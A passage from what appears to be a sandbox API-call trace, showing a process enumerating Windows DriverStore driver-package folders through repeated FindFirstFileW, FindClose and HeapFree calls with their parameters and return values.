lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\crcdisk.inf_amd64_neutral_d10626d1f8b423c3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3dd4eab2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60815610, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60815610, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.918] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.918] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.918] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxfalcon_ibv64.inf_amd64_neutral_d065aec3fcf4ec4e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45ee3941, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b195e9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b195e9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.919] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.920] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxfalpal_ibv64.inf_amd64_neutral_4c42ac5f00413365\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x45fc8183, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b3f749, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b3f749, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.922] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.923] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_fm1216mk5_ibv64.inf_amd64_neutral_3eaae75b591bd148\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4616b0a6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b8ba0a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b8ba0a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.924] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.925] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_fm1236mk5_ibv64.inf_amd64_neutral_b81bec917adfaea5\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46229787, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65bd7cca, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65bd7cca, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.927] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\cxraptor_philipstuv1236d_ibv64.inf_amd64_neutral_b6a3e57df5bad299\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x460ac9c4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65b658a9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65b658a9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.929] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.930] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dc21x4vm.inf_amd64_neutral_8887242a56ee027e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43ee7166, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6218615f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6218615f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.930] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\digitalmediadevice.inf_amd64_neutral_6fd673519d66ab20\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fea1ef0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60f85ade, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60f85ade, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.932] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.932] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\disk.inf_amd64_neutral_10ce25bbc5a9cc43\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42c28403, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f24b5a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f24b5a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.932] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\display.inf_amd64_neutral_ea1c8215e52777a6\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a218705, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f89c6f4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f89c6f4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.933] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.933] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\divacx64.inf_amd64_neutral_fa0f82f024789743\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x397d4812, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f63b0ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f63b0ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.935] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.936] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dot4.inf_amd64_neutral_b89cfac15ccb2fba\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a0c1aa3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f82a2d3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f82a2d3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.938] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36ed0bf1, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b3d8a70, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b3d8a70, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.939] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.939] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\eaphost.inf_amd64_neutral_4506dea11740c089\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d20021d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x606e4b0e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x606e4b0e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.940] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.940] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ehstorcertdrv.inf_amd64_neutral_2e1cecffae9c899a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fa9d9c8, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60f5f97d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60f5f97d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.941] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.941] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.941] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ehstorpwddrv.inf_amd64_neutral_ecd233d7cabbdebf\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3dde7033, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6083b770, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6083b770, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.942] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\elxstor.inf_amd64_neutral_4263942b9dfe9077\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x420d9b6f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61bded14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61bded14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.942] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxca003.inf_amd64_neutral_5b8c7c1dda79bef4\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b3a6966, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6013d6c3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6013d6c3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.944] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.945] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxcn001.inf_amd64_neutral_d23021a1eb548156\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b465047, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.946] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.946] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxcn002.inf_amd64_neutral_3d392ccc357e04db\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b4d7468, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.946] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.946] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\fdc.inf_amd64_neutral_bbcfca39fdc02275\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43a9697e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62113d3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62113d3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.947] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.947] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\flpydisk.inf_amd64_neutral_f54222cc59267e1e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x439d829d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62113d3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62113d3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.951] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.951] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\gameport.inf_amd64_neutral_fe5c4f29488f121e\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e1eb55b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x608adb91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x608adb91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.951] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.951] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.951] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hal.inf_amd64_neutral_232b95977cf6d84c\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42eafb68, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f4acbb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f4acbb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.952] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.952] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.952] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw72b64.inf_amd64_neutral_023772237d3a4ade\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4656f5cd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65cbc50c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65cbc50c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.953] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.954] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw85b64.inf_amd64_neutral_22b436d5d06ab017\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463803e9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65c23f8b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65c23f8b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.956] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.957] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw85c64.inf_amd64_neutral_96b71557b416d04a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4648ad8b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65cbc50c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65cbc50c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.958] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudbus.inf_amd64_neutral_4b99fffee061ff26\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3875ceff, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bbbb35f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bbbb35f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.958] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.958] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudio.inf_amd64_neutral_ce7bc199c85ae0a0\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36dc624f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b31a38f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b31a38f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.959] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudss.inf_amd64_neutral_330a593eb888237c\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e50b241, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6091ffb2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6091ffb2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2de32, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x720fa8 [0030.959] FindClose (in: hFindFile=0x720fa8 | out: hFindFile=0x720fa8) returned 1 [0030.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidbth.inf_amd64_neutral_8a1323fc68ad84af\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d865d49, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607a31ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, 